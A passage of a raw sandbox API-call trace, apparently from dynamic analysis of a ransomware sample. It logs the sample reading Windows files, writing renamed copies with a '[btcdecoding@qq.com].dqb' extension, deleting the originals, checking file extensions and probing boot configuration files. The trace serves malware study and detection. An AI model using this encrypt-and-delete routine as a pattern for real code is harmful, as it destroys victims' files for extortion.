hFile=0x180, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xec, lpOverlapped=0x0) returned 1 [0059.271] SetEndOfFile (hFile=0x180) returned 1 [0059.271] CloseHandle (hObject=0x180) returned 1 [0059.271] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.271] SetEndOfFile (hFile=0x158) returned 1 [0059.272] CloseHandle (hObject=0x158) returned 1 [0059.272] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0059.273] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01169_.wmf")) returned 1 [0059.273] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 63 [0059.273] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 63 [0059.273] lstrlenW (lpString=".doc") returned 4 [0059.273] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0059.273] lstrlenW (lpString=".docx") returned 5 [0059.273] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0059.273] lstrlenW (lpString=".pdf") returned 4 [0059.273] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0059.273] lstrlenW (lpString=".xls") returned 4 [0059.273] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0059.273] lstrlenW (lpString=".xlsx") returned 5 [0059.273] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0059.273] lstrlenW (lpString=".ppt") returned 4 [0059.273] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0059.273] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 63 [0059.273] lstrlenW (lpString=".zip") returned 4 [0059.273] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0059.273] lstrlenW (lpString=".rar") returned 4 [0059.273] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0059.273] lstrlenW (lpString=".bz2") returned 4 [0059.273] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0059.273] lstrlenW (lpString=".7z") returned 3 [0059.273] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0059.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 63 [0059.274] lstrlenW (lpString=".dbf") returned 4 [0059.274] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0059.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 63 [0059.274] lstrlenW (lpString=".1cd") returned 4 [0059.274] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0059.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 63 [0059.274] lstrlenW (lpString=".jpg") returned 4 [0059.274] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0059.276] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.276] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.276] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01170_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0059.276] GetLastError () returned 0x0 [0059.276] ReadFile (in: hFile=0x158, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x964, lpOverlapped=0x0) returned 1 [0059.277] WriteFile (in: hFile=0x180, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x970, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x970, lpOverlapped=0x0) returned 1 [0059.278] ReadFile (in: hFile=0x158, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0059.278] WriteFile (in: hFile=0x180, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xec, lpOverlapped=0x0) returned 1 [0059.278] SetEndOfFile (hFile=0x180) returned 1 [0059.279] CloseHandle (hObject=0x180) returned 1 [0059.279] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.279] SetEndOfFile (hFile=0x158) returned 1 [0059.279] CloseHandle (hObject=0x158) returned 1 [0059.279] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0059.280] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01170_.wmf")) returned 1 [0059.280] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 63 [0059.280] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 63 [0059.280] lstrlenW (lpString=".doc") returned 4 [0059.280] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0059.280] lstrlenW (lpString=".docx") returned 5 [0059.280] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0059.280] lstrlenW (lpString=".pdf") returned 4 [0059.280] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0059.280] lstrlenW (lpString=".xls") returned 4 [0059.280] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0059.280] lstrlenW (lpString=".xlsx") returned 5 [0059.280] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0059.280] lstrlenW (lpString=".ppt") returned 4 [0059.280] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0059.280] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 63 [0059.280] lstrlenW (lpString=".zip") returned 4 [0059.280] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0059.280] lstrlenW (lpString=".rar") returned 4 [0059.280] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0059.280] lstrlenW (lpString=".bz2") returned 4 [0059.280] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0059.281] lstrlenW (lpString=".7z") returned 3 [0059.281] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0059.281] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 63 [0059.281] lstrlenW (lpString=".dbf") returned 4 [0059.281] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0059.281] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 63 [0059.281] lstrlenW (lpString=".1cd") returned 4 [0059.281] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0059.281] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01170_.WMF") returned 63 [0059.281] lstrlenW (lpString=".jpg") returned 4 [0059.281] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0059.281] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.281] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.281] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01171_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0059.281] GetLastError () returned 0x0 [0059.282] ReadFile (in: hFile=0x158, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x804, lpOverlapped=0x0) returned 1 [0060.049] WriteFile (in: hFile=0x180, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x810, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x810, lpOverlapped=0x0) returned 1 [0060.050] ReadFile (in: hFile=0x158, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0060.050] WriteFile (in: hFile=0x180, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xec, lpOverlapped=0x0) returned 1 [0060.050] SetEndOfFile (hFile=0x180) returned 1 [0060.092] CloseHandle (hObject=0x180) returned 1 [0060.151] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.151] SetEndOfFile (hFile=0x158) returned 1 [0060.185] CloseHandle (hObject=0x158) returned 1 [0060.186] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0060.186] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01171_.wmf")) returned 1 [0060.186] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 63 [0060.186] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 63 [0060.186] lstrlenW (lpString=".doc") returned 4 [0060.186] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0060.186] lstrlenW (lpString=".docx") returned 5 [0060.186] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0060.186] lstrlenW (lpString=".pdf") returned 4 [0060.186] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0060.186] lstrlenW (lpString=".xls") returned 4 [0060.186] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0060.186] lstrlenW (lpString=".xlsx") returned 5 [0060.186] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0060.186] lstrlenW (lpString=".ppt") returned 4 [0060.186] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0060.186] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 63 [0060.186] lstrlenW (lpString=".zip") returned 4 [0060.186] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0060.186] lstrlenW (lpString=".rar") returned 4 [0060.186] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0060.187] lstrlenW (lpString=".bz2") returned 4 [0060.187] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0060.187] lstrlenW (lpString=".7z") returned 3 [0060.187] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0060.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 63 [0060.187] lstrlenW (lpString=".dbf") returned 4 [0060.187] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0060.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 63 [0060.187] lstrlenW (lpString=".1cd") returned 4 [0060.187] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0060.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF") returned 63 [0060.187] lstrlenW (lpString=".jpg") returned 4 [0060.187] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 Thread: id = 16 os_tid = 0xadc [0032.439] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10000) returned 0x38e06b0 [0032.439] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10000) returned 0x38f06b8 [0032.439] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5c03c0 [0032.439] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x6) returned 0x5c30e0 [0032.439] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5c03d8 [0032.439] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x100000) returned 0x3db0020 [0032.440] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5c03f0 [0032.440] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5c03f0, Size=0x20) returned 0x5a5c78 [0032.440] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5c03f0 [0032.440] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x5c03f0, Size=0x20) returned 0x5a5ca0 [0032.440] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0032.440] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0032.440] Wow64DisableWow64FsRedirection (in: OldValue=0x32bff58 | out: OldValue=0x32bff58*=0x0) returned 1 [0032.440] lstrlenW (lpString="kernel32.dll") returned 12 [0032.440] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a5c78 | out: hHeap=0x570000) returned 1 [0032.440] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0032.440] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a5ca0 | out: hHeap=0x570000) returned 1 [0032.441] Sleep (dwMilliseconds=0x64) [0032.705] lstrlenW (lpString="BCD") returned 3 [0032.705] CreateFileW (lpFileName="C:\\Boot\\BCD" (normalized: "c:\\boot\\bcd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0032.705] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0032.705] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0032.705] lstrlenW (lpString=".doc") returned 4 [0032.705] lstrcmpiW (lpString1=".doc", lpString2="\\BCD") returned -1 [0032.705] lstrlenW (lpString=".docx") returned 5 [0032.705] lstrcmpiW (lpString1=".docx", lpString2="t\\BCD") returned -1 [0032.705] lstrlenW (lpString=".pdf") returned 4 [0032.705] lstrcmpiW (lpString1=".pdf", lpString2="\\BCD") returned -1 [0032.705] lstrlenW (lpString=".xls") returned 4 [0032.705] lstrcmpiW (lpString1=".xls", lpString2="\\BCD") returned -1 [0032.705] lstrlenW (lpString=".xlsx") returned 5 [0032.705] lstrcmpiW (lpString1=".xlsx", lpString2="t\\BCD") returned -1 [0032.705] lstrlenW (lpString=".ppt") returned 4 [0032.706] lstrcmpiW (lpString1=".ppt", lpString2="\\BCD") returned -1 [0032.706] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0032.706] lstrlenW (lpString=".zip") returned 4 [0032.706] lstrcmpiW (lpString1=".zip", lpString2="\\BCD") returned -1 [0032.706] lstrlenW (lpString=".rar") returned 4 [0032.706] lstrcmpiW (lpString1=".rar", lpString2="\\BCD") returned -1 [0032.706] lstrlenW (lpString=".bz2") returned 4 [0032.706] lstrcmpiW (lpString1=".bz2", lpString2="\\BCD") returned -1 [0032.706] lstrlenW (lpString=".7z") returned 3 [0032.706] lstrcmpiW (lpString1=".7z", lpString2="BCD") returned -1 [0032.706] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0032.706] lstrlenW (lpString=".dbf") returned 4 [0032.706] lstrcmpiW (lpString1=".dbf", lpString2="\\BCD") returned -1 [0032.706] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0032.706] lstrlenW (lpString=".1cd") returned 4 [0032.706] lstrcmpiW (lpString1=".1cd", lpString2="\\BCD") returned -1 [0032.706] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0032.706] lstrlenW (lpString=".jpg") returned 4 [0032.706] lstrcmpiW (lpString1=".jpg", lpString2="\\BCD") returned -1 [0032.706] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0032.706] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0032.706] lstrlenW (lpString=".doc") returned 4 [0032.706] lstrcmpiW (lpString1=".doc", lpString2="\\BCD") returned -1 [0032.706] lstrlenW (lpString=".docx") returned 5 [0032.706] lstrcmpiW (lpString1=".docx", lpString2="t\\BCD") returned -1 [0032.706] lstrlenW (lpString=".pdf") returned 4 [0032.706] lstrcmpiW (lpString1=".pdf", lpString2="\\BCD") returned -1 [0032.706] lstrlenW (lpString=".xls") returned 4 [0032.706] lstrcmpiW (lpString1=".xls", lpString2="\\BCD") returned -1 [0032.706] lstrlenW (lpString=".xlsx") returned 5 [0032.706] lstrcmpiW (lpString1=".xlsx", lpString2="t\\BCD") returned -1 [0032.706] lstrlenW (lpString=".ppt") returned 4 [0032.706] lstrcmpiW (lpString1=".ppt", lpString2="\\BCD") returned -1 [0032.706] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0032.706] lstrlenW (lpString=".zip") returned 4 [0032.707] lstrcmpiW (lpString1=".zip", lpString2="\\BCD") returned -1 [0032.707] lstrlenW (lpString=".rar") returned 4 [0032.707] lstrcmpiW (lpString1=".rar", lpString2="\\BCD") returned -1 [0032.707] lstrlenW (lpString=".bz2") returned 4 [0032.707] lstrcmpiW (lpString1=".bz2", lpString2="\\BCD") returned -1 [0032.707] lstrlenW (lpString=".7z") returned 3 [0032.707] lstrcmpiW (lpString1=".7z", lpString2="BCD") returned -1 [0032.707] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0032.707] lstrlenW (lpString=".dbf") returned 4 [0032.707] lstrcmpiW (lpString1=".dbf", lpString2="\\BCD") returned -1 [0032.707] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0032.707] lstrlenW (lpString=".1cd") returned 4 [0032.707] lstrcmpiW (lpString1=".1cd", lpString2="\\BCD") returned -1 [0032.707] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0032.707] lstrlenW (lpString=".jpg") returned 4 [0032.707] lstrcmpiW (lpString1=".jpg", lpString2="\\BCD") returned -1 [0032.707] lstrcmpiW (lpString1=".LOG1", lpString2=".dqb") returned 1 [0032.707] lstrlenW (lpString="BCD.LOG1") returned 8 [0032.707] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0032.822] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=0) returned 1 [0032.822] CloseHandle (hObject=0x160) returned 1 [0032.822] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0032.822] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0032.822] lstrlenW (lpString=".doc") returned 4 [0032.822] lstrcmpiW (lpString1=".doc", lpString2="LOG1") returned -1 [0032.822] lstrlenW (lpString=".docx") returned 5 [0032.822] lstrcmpiW (lpString1=".docx", lpString2=".LOG1") returned -1 [0032.822] lstrlenW (lpString=".pdf") returned 4 [0032.822] lstrcmpiW (lpString1=".pdf", lpString2="LOG1") returned -1 [0032.822] lstrlenW (lpString=".xls") returned 4 [0032.822] lstrcmpiW (lpString1=".xls", lpString2="LOG1") returned -1 [0032.822] lstrlenW (lpString=".xlsx") returned 5 [0032.822] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG1") returned 1 [0032.822] lstrlenW (lpString=".ppt") returned 4 [0032.823] lstrcmpiW (lpString1=".ppt", lpString2="LOG1") returned -1 [0032.823] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0032.823] lstrlenW (lpString=".zip") returned 4 [0032.823] lstrcmpiW (lpString1=".zip", lpString2="LOG1") returned -1 [0032.823] lstrlenW (lpString=".rar") returned 4 [0032.823] lstrcmpiW (lpString1=".rar", lpString2="LOG1") returned -1 [0032.823] lstrlenW (lpString=".bz2") returned 4 [0032.823] lstrcmpiW (lpString1=".bz2", lpString2="LOG1") returned -1 [0032.823] lstrlenW (lpString=".7z") returned 3 [0032.823] lstrcmpiW (lpString1=".7z", lpString2="OG1") returned -1 [0032.823] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0032.823] lstrlenW (lpString=".dbf") returned 4 [0032.823] lstrcmpiW (lpString1=".dbf", lpString2="LOG1") returned -1 [0032.823] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0032.823] lstrlenW (lpString=".1cd") returned 4 [0032.823] lstrcmpiW (lpString1=".1cd", lpString2="LOG1") returned -1 [0032.823] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0032.823] lstrlenW (lpString=".jpg") returned 4 [0032.823] lstrcmpiW (lpString1=".jpg", lpString2="LOG1") returned -1 [0032.823] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0032.823] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0032.823] lstrlenW (lpString=".doc") returned 4 [0032.823] lstrcmpiW (lpString1=".doc", lpString2="LOG1") returned -1 [0032.823] lstrlenW (lpString=".docx") returned 5 [0032.823] lstrcmpiW (lpString1=".docx", lpString2=".LOG1") returned -1 [0032.823] lstrlenW (lpString=".pdf") returned 4 [0032.823] lstrcmpiW (lpString1=".pdf", lpString2="LOG1") returned -1 [0032.823] lstrlenW (lpString=".xls") returned 4 [0032.823] lstrcmpiW (lpString1=".xls", lpString2="LOG1") returned -1 [0032.823] lstrlenW (lpString=".xlsx") returned 5 [0032.823] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG1") returned 1 [0032.823] lstrlenW (lpString=".ppt") returned 4 [0032.823] lstrcmpiW (lpString1=".ppt", lpString2="LOG1") returned -1 [0032.823] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0032.823] lstrlenW (lpString=".zip") returned 4 [0032.824] lstrcmpiW (lpString1=".zip", lpString2="LOG1") returned -1 [0032.824] lstrlenW (lpString=".rar") returned 4 [0032.824] lstrcmpiW (lpString1=".rar", lpString2="LOG1") returned -1 [0032.824] lstrlenW (lpString=".bz2") returned 4 [0032.824] lstrcmpiW (lpString1=".bz2", lpString2="LOG1") returned -1 [0032.824] lstrlenW (lpString=".7z") returned 3 [0032.824] lstrcmpiW (lpString1=".7z", lpString2="OG1") returned -1 [0032.824] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0032.824] lstrlenW (lpString=".dbf") returned 4 [0032.824] lstrcmpiW (lpString1=".dbf", lpString2="LOG1") returned -1 [0032.824] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0032.824] lstrlenW (lpString=".1cd") returned 4 [0032.824] lstrcmpiW (lpString1=".1cd", lpString2="LOG1") returned -1 [0032.824] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0032.824] lstrlenW (lpString=".jpg") returned 4 [0032.824] lstrcmpiW (lpString1=".jpg", lpString2="LOG1") returned -1 [0032.824] lstrcmpiW (lpString1=".LOG2", lpString2=".dqb") returned 1 [0032.824] lstrlenW (lpString="BCD.LOG2") returned 8 [0032.824] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0032.824] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=0) returned 1 [0032.824] CloseHandle (hObject=0x160) returned 1 [0032.825] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0032.825] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0032.825] lstrlenW (lpString=".doc") returned 4 [0032.825] lstrcmpiW (lpString1=".doc", lpString2="LOG2") returned -1 [0032.825] lstrlenW (lpString=".docx") returned 5 [0032.825] lstrcmpiW (lpString1=".docx", lpString2=".LOG2") returned -1 [0032.825] lstrlenW (lpString=".pdf") returned 4 [0032.825] lstrcmpiW (lpString1=".pdf", lpString2="LOG2") returned -1 [0032.825] lstrlenW (lpString=".xls") returned 4 [0032.825] lstrcmpiW (lpString1=".xls", lpString2="LOG2") returned -1 [0032.825] lstrlenW (lpString=".xlsx") returned 5 [0032.825] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG2") returned 1 [0032.825] lstrlenW (lpString=".ppt") returned 4 [0032.825] lstrcmpiW (lpString1=".ppt", lpString2="LOG2") returned -1 [0032.825] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0032.825] lstrlenW (lpString=".zip") returned 4 [0032.825] lstrcmpiW (lpString1=".zip", lpString2="LOG2") returned -1 [0032.825] lstrlenW (lpString=".rar") returned 4 [0032.825] lstrcmpiW (lpString1=".rar", lpString2="LOG2") returned -1 [0032.825] lstrlenW (lpString=".bz2") returned 4 [0032.825] lstrcmpiW (lpString1=".bz2", lpString2="LOG2") returned -1 [0032.825] lstrlenW (lpString=".7z") returned 3 [0032.825] lstrcmpiW (lpString1=".7z", lpString2="OG2") returned -1 [0032.825] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0032.825] lstrlenW (lpString=".dbf") returned 4 [0032.825] lstrcmpiW (lpString1=".dbf", lpString2="LOG2") returned -1 [0032.825] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0032.825] lstrlenW (lpString=".1cd") returned 4 [0032.825] lstrcmpiW (lpString1=".1cd", lpString2="LOG2") returned -1 [0032.825] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0032.825] lstrlenW (lpString=".jpg") returned 4 [0032.825] lstrcmpiW (lpString1=".jpg", lpString2="LOG2") returned -1 [0032.825] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0032.825] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0032.826] lstrlenW (lpString=".doc") returned 4 [0032.826] lstrcmpiW (lpString1=".doc", lpString2="LOG2") returned -1 [0032.826] lstrlenW (lpString=".docx") returned 5 [0032.826] lstrcmpiW (lpString1=".docx", lpString2=".LOG2") returned -1 [0032.826] lstrlenW (lpString=".pdf") returned 4 [0032.826] lstrcmpiW (lpString1=".pdf", lpString2="LOG2") returned -1 [0032.826] lstrlenW (lpString=".xls") returned 4 [0032.826] lstrcmpiW (lpString1=".xls", lpString2="LOG2") returned -1 [0032.826] lstrlenW (lpString=".xlsx") returned 5 [0032.826] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG2") returned 1 [0032.826] lstrlenW (lpString=".ppt") returned 4 [0032.826] lstrcmpiW 